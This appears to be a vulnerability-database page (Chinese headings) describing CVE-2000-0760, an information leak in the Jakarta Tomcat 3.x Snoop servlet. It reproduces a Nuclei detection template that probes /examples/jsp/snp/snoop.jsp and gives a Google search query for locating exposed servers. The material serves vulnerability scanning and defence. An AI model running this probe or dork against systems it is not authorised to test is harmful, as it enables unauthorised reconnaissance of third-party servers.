CVE-2000-0760: Jakarta Tomcat 3.1 and 3.0 - Exposure

日期: 2025-08-01 | 影响软件: Jakarta Tomcat | POC: 已公开

漏洞描述

The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.

PoC代码[已公开]

id: CVE-2000-0760

info:
  name: Jakarta Tomcat 3.1 and 3.0 - Exposure
  author: Thabisocn
  severity: low
  description: |
    The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
  reference:
    - https://vulners.com/nessus/TOMCAT_SNOOP.NASL
    - https://nvd.nist.gov/vuln/detail/CVE-2000-0760
  classification:
    epss-score: 0.37735
    epss-percentile: 0.97108
  metadata:
    max-request: 1
    verified: true
    google-query: site:*/examples/jsp/snp/snoop.jsp
    vendor: apache
    product: tomcat
  tags: cve,cve2000,jakarta,tomcat,exposure,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/examples/jsp/snp/snoop.jsp"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Request Information"
          - "Path info"
          - "Server name"
          - "Remote address"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cde3da5c6caff1d130bc8ae421c8e75cd5b3d90ec1bd95abce8af577ac8cd70b02203f9342a6a85e0a7485c63660b92df69414e948551e054930063530099633ee39:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2000/CVE-2000-0760.yaml